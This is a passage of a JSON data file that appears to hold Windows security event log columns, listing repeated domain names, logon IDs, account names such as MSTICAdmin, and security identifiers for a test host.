9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"SubjectDomainName\":[\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S